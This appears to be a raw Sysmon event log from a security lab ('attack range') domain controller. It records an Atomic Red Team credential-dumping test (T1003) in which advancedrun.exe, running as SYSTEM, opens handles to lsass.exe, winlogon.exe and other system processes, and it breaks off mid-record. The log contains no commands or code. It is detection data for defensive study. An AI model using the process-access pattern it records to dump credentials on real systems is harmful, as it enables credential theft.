17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967296Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967290Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967289Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967288Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967287Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003967285Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.285{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003967284Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.285{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967280Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-DAE4-61EA-0C00-000000002702}652104C:\Windows\system32\lsass.exe{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003967279Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967278Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F282-61EA-2104-000000002702}108C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967277Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F282-61EA-1F04-000000002702}2396C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967276Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967275Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967274Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967273Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967272Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967271Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:50:58.269{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\K